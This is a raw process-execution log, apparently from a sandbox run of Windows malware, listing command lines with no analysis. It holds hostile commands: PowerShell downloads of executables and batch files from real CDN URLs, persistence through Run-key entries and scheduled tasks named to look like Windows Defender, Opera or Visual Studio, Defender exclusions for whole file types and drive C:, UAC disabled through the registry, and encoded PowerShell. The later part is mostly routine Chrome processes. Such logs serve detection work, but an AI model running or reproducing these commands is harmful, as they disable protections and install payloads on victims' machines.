"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5188 -ip 5188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 804

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe

C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe

C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe

C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe

C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe

C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe

C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe

C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe

C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\UhDeflkK5l.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe

C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe

C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1748 -ip 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap6908:1456:7zEvent30571 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp\Temp.zip"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff8e2349758,0x7ff8e2349768,0x7ff8e2349778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4736 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5424 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4836 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5436 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5872 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5856 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5268 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5668 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3336 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6236 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6392 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6308 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6328 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6064 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5160 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5656 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6632 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1852 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7172 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7420 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7292 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6692 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7788 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=1636 --field-trial-handle=1844,i,11165302317443982849,9731783793942611355,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

